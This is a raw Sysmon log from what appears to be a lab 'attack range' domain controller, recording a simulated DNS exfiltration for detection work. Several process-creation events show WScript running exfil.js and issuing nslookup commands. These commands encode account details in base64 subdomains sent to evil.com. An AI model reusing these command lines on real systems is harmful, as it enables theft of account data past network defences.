14:16:23.896{2E1864BB-17B7-629A-853F-000000005F02}54728028C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-843F-000000005F02}4336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-853F-000000005F02}5472C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-843F-000000005F02}4336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-17A1-629A-783D-000000005F02}55527220C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-843F-000000005F02}4336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.883{2E1864BB-17B7-629A-843F-000000005F02}4336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlryyjg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.874{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzpvm.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-17B7-629A-823F-000000005F02}73443236C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-833F-000000005F02}7584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-833F-000000005F02}7584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.843{2E1864BB-17B7-629A-813F-000000005F02}74286304C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-833F-000000005F02}7584C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.851{2E1864BB-17B7-629A-833F-000000005F02}7584C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-813F-000000005F02}7428C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzpvm.tmp 2>&1 10341000x8000000000000000198120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.828{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-823F-000000005F02}7344C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.828{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-823F-000000005F02}7344C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.828{2E1864BB-17B7-629A-823F-000000005F02}73443236C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-813F-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-823F-000000005F02}7344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-813F-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.812{2E1864BB-17A1-629A-783D-000000005F02}55527508C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-813F-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.816{2E1864BB-17B7-629A-813F-000000005F02}7428C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzpvm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.796{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlglznk.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-17B7-629A-7F3F-000000005F02}78647456C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-803F-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 